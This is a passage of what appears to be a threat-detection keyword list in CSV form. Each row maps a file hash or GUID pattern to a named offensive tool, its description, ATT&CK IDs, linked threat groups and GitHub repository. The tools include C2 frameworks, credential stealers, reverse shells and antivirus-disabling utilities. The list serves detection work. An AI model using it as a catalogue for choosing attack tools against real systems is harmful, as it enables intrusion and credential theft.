"*e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32*",".{0,1000}e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42126" "*e5a25276797532ee1ab3c07ec17baddb9b7ad661890dfe2f9b91aa4db1eb2781*",".{0,1000}e5a25276797532ee1ab3c07ec17baddb9b7ad661890dfe2f9b91aa4db1eb2781.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42128" "*e5a678fe7b074f6651954aa7c3643a21bf9019b9b0d504591a7c3e21283417ff*",".{0,1000}e5a678fe7b074f6651954aa7c3643a21bf9019b9b0d504591a7c3e21283417ff.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","42129" "*e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b*",".{0,1000}e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","42130" "*e5a9c124911cf7d0f0f2f202a067744df6ecb534b93072def963b5eb449b2b3a*",".{0,1000}e5a9c124911cf7d0f0f2f202a067744df6ecb534b93072def963b5eb449b2b3a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42131" "*e5aef5ed2d977915b2288135ea8689b1fb15f619021a8a5b788a475a068cde8b*",".{0,1000}e5aef5ed2d977915b2288135ea8689b1fb15f619021a8a5b788a475a068cde8b.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","42132" "*E5AF133E4976EE14EA6EDB8652F354A18483289E2E1B6043D905B821FA84C53C*",".{0,1000}E5AF133E4976EE14EA6EDB8652F354A18483289E2E1B6043D905B821FA84C53C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","42133" "*e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0*",".{0,1000}e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42135" "*e5ce8b2978d87ed5506c7b7dcad0d363c70f64ce5fad4b7e4beb465d60aada58*",".{0,1000}e5ce8b2978d87ed5506c7b7dcad0d363c70f64ce5fad4b7e4beb465d60aada58.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","42136" "*e5d6d5fe4ebbae6ba141cf25faa3f05e915916b0980b90297a8b2e59b2312bb8*",".{0,1000}e5d6d5fe4ebbae6ba141cf25faa3f05e915916b0980b90297a8b2e59b2312bb8.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42137" "*e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0*",".{0,1000}e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42138" "*e5e994caa93a88d8a0dea6d4267336d13e00d5963cfa5d9ad33235f072d5eec2*",".{0,1000}e5e994caa93a88d8a0dea6d4267336d13e00d5963cfa5d9ad33235f072d5eec2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42141" "*e5eb2c94e78da85d2a4b0cf973bab87ab3e9d877da6a169d3f2cf9b40eb73a1b*",".{0,1000}e5eb2c94e78da85d2a4b0cf973bab87ab3e9d877da6a169d3f2cf9b40eb73a1b.{0,1000}","offensive_tool_keyword","defender-control","An 
open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","42142" "*e5ee043da6e74b1cbee3fd4035a6f80a22c89e1813c5bfbd2572a594f93fd740*",".{0,1000}e5ee043da6e74b1cbee3fd4035a6f80a22c89e1813c5bfbd2572a594f93fd740.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42143" "*e5f220215fdf2ccc6b92dcbf95b6967d7a4f2bd4b0668413728c37bdd3833304*",".{0,1000}e5f220215fdf2ccc6b92dcbf95b6967d7a4f2bd4b0668413728c37bdd3833304.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","42144" "*e5f826920a0effa33441079ae4eb87f7dc31534bb6577ba322f13c7d838d5b17*",".{0,1000}e5f826920a0effa33441079ae4eb87f7dc31534bb6577ba322f13c7d838d5b17.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","42145" "*e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6*",".{0,1000}e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42147" "*e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6*",".{0,1000}e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 
- APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42148" "*E6104BC9-FEA9-4EE9-B919-28156C1F2EDE*",".{0,1000}E6104BC9\-FEA9\-4EE9\-B919\-28156C1F2EDE.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","#GUIDproject","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","42150" "*e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f*",".{0,1000}e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42152" "*E61C950E-A03D-40E2-AAD5-304C48570364*",".{0,1000}E61C950E\-A03D\-40E2\-AAD5\-304C48570364.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#GUIDproject","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","42153" "*e62043f8389effbe26300cc7cd1d9af3b25d6efc1eb0d604d837f58a89e485ad*",".{0,1000}e62043f8389effbe26300cc7cd1d9af3b25d6efc1eb0d604d837f58a89e485ad.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42155" "*e62b8454cfe35f36330c83adb4665982afe6a22d9edd47a923a7aecf135cd99b*",".{0,1000}e62b8454cfe35f36330c83adb4665982afe6a22d9edd47a923a7aecf135cd99b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42158" "*e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3*",".{0,1000}e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42159" "*e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d*",".{0,1000}e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42160" "*e62fbd3fb597685aefc283c4a27753e5495fdc7a6e4acd349304d4ab242a32c6*",".{0,1000}e62fbd3fb597685aefc283c4a27753e5495fdc7a6e4acd349304d4ab242a32c6.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","42161" "*e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8*",".{0,1000}e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42162" "*e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd*",".{0,1000}e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42163" "*e6359a7bfd1ac7ffb8432de776f66ad70e20ba588880e641613aabf29dffa0c3*",".{0,1000}e6359a7bfd1ac7ffb8432de776f66ad70e20ba588880e641613aabf29dffa0c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42164" 
"*e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8*",".{0,1000}e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42168" "*e6449478a32a49ac379f11e0f346267f44f590e777c32902e2bc06903118a69a*",".{0,1000}e6449478a32a49ac379f11e0f346267f44f590e777c32902e2bc06903118a69a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42170" "*e64efe84d00a0c06cc9672f7d2c96e39c6ef7ef4b8ff1671f35e369a03431af9*",".{0,1000}e64efe84d00a0c06cc9672f7d2c96e39c6ef7ef4b8ff1671f35e369a03431af9.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","42172" "*e6542f9cae2a9555feab0aef1287bc9a1ececc56f6e144a731546c68fe5843c5*",".{0,1000}e6542f9cae2a9555feab0aef1287bc9a1ececc56f6e144a731546c68fe5843c5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42173" "*e65ca194ca5dd3606ca5c0b67b2cf3df4cc38283e4aa11933002b430fc5be17b*",".{0,1000}e65ca194ca5dd3606ca5c0b67b2cf3df4cc38283e4aa11933002b430fc5be17b.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","42175" "*e65f36c9186c0a94d3cb013a1083ef0cef93b3cbc2d8af77dc0911bcced37c62*",".{0,1000}e65f36c9186c0a94d3cb013a1083ef0cef93b3cbc2d8af77dc0911bcced37c62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42176" "*e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad*",".{0,1000}e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42177" "*e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e*",".{0,1000}e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42179" "*e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735*",".{0,1000}e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","42185" "*e68d7eeec87b2ff9e85cb89198c49f36cace41a13262e8a3c2ce3c4852e192c6*",".{0,1000}e68d7eeec87b2ff9e85cb89198c49f36cace41a13262e8a3c2ce3c4852e192c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42186" "*e6908a1213c11347794011b5d126561d39408d3e9e919f1a719135a6221813b9*",".{0,1000}e6908a1213c11347794011b5d126561d39408d3e9e919f1a719135a6221813b9.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","42187" "*e693e05888147223f78c57a5d2a0bccc594af7e6f0d9c5d6bd8a0cb5d420a851*",".{0,1000}e693e05888147223f78c57a5d2a0bccc594af7e6f0d9c5d6bd8a0cb5d420a851.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42188" "*e696484e41d70abaa95a09f2c77e5198a6556f5f5884f0d84bf21c5926c5afc7*",".{0,1000}e696484e41d70abaa95a09f2c77e5198a6556f5f5884f0d84bf21c5926c5afc7.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","42189" "*e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7*","e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","42191" "*e69d0aa27378192017324d6748de04c9024a2254b599e93c22815e145b28dbc2*",".{0,1000}e69d0aa27378192017324d6748de04c9024a2254b599e93c22815e145b28dbc2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42192" "*e69f0324-3afb-485e-92c7-cb097ea47caf*",".{0,1000}e69f0324\-3afb\-485e\-92c7\-cb097ea47caf.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#GUIDproject","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","42193" 